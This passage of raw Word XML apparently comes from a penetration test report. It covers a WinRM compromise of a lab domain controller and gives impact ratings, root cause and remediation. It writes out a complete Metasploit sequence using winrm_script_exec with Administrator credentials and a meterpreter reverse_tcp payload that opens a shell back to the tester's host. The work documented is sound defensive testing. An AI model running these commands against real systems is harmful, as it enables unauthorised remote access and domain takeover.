        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="781713F1"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High — full domain credential access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="72A22DBD" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4526C0DD"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Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AC1A9F6"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High — full system and domain write access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="671AC9D8" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52C190BD"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Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66DA7DD9"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High — attacker can disrupt or destroy domain services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="481A97D7" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09BE3F69"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62934DC0"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CWE-287 — Improper Authentication; CWE-521 — Weak Password Requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="3D620C86" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F3FEBD2"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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1246B387"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 xml:space="preserve">T1021.006 (Remote Services: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>), T1078 (Valid Accounts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="1E0A1D73" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75873948"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Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FAD7FBB"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 xml:space="preserve">Weak/reused credentials (Hello@123), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> exposed on domain network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="65DB81A6" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05188991"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CISA KEV Listed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1962296A"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="1EC76492" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3109BBB6"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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D72F900"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 xml:space="preserve">Enforce MFA on privileged accounts; restrict </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> via firewall/WDAC; rotate all domain credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04504B07" w14:textId="788D0CB9" w:rsidR="00453791" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>A credentialed exploitation off the previous stage of the exploitation was followed by the use of Windows Remote management (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">) to obtain a remote code execution of the Windows Server 2019 Domain Controller of 192.168.174.155. It was performed against the domain of cs.org as Administrator / Hello@123, which is a pass-the-credential attack against an open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> service.</w:t>
      </w:r>
      <w:r w:rsidR="00453791" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7075A" w14:textId="77777777" w:rsidR="00D22F4D" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00D22F4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 1 — </w:t>
      </w:r>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit Exploit setup and exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B1E975" w14:textId="77777777" w:rsidR="00D22F4D" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D" w:rsidP="00D22F4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>A Metasploit module exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>winrm_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>-exec was set up as the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32264BA2" w14:textId="1A120E0E" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00D22F4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02306337" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/winrm_script_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155AF4E6" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set RHOSTS     192.168.174.155</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D71CCB5" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set USERNAME   Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C73296" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set PASSWORD   Hello@123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ECA7D8" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set DOMAIN     cs.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEFCCFA" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set LHOST      192.168.174.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009785EB" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set LPORT      4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF92C90" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set PAYLOAD    windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="252F5FE4" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set FORCE_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>VBS  true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="257E6906" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806EA0B" w14:textId="77777777" w:rsidR="00453791" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A09D964" wp14:editId="46E5C2B2">
            <wp:extent cx="5943600" cy="3533775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13424440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444039" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3533775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA85701" w14:textId="43136903" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. </w:t>
      </w:r>
      <w:r w:rsidR="00F016B3" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Metasploit console showing the full module configuration and execution. The FORCE_VBS true option was set to force VBScript-based execution. The Command Stager progressed through multiple stages (16% → 32% → 48% → 64% → 80% → 95% → 100%), successfully sending a 232,000-byte stage to 192.168.174.155.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360DEE58" w14:textId="77777777" w:rsidR="00453791" w:rsidRPr="00C668B5" w:rsidRDefault="00453791">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EC862" w14:textId="34442A0C" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
